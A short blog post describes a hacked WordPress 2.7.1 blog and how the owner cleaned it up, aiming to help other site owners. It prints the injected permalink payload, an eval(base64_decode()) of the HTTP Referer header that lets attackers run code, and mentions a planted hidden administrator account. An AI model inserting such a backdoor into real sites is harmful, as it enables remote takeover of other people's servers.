Is your WordPress blog secure? You are apparently safe if you keep your blog update with all the security patches. In one of my old word press installation 2.7.1 I have found a strange error that non of the link was opening and browser was displaying the error instead of next page

Your browser sent a request that this server could not understand.

To figure out this problem I have just noticed an addition of a strange code at the end of all my URLs as

http://www.example.com/this-is-my-blog-post/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

What the hell this strange code is? As I have not added any new plugin or made any recent change to my blog since last many weeks so where from this came?

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

This clearly showed that my blog had been hacked. Then blog was fixed by these steps

How to fix this?

go to Setting->Permalinks and delete the above mean code
go to users, you may notice there are more administrators than usual. If you can not find any additional Admin then you may need to use a search in PHPMyAdmin to find the hidden admin with a weird code as a first name.
Delete the code and make him a subscriber then return to users and
delete him.

Upgrade the blog to the latest version 2.8.4

Related Topics
WordPress Adding Strange Code to the End of Post URL Links
WordPress All links in the site freaked out!
Find if your Wordpress installation has been hacked?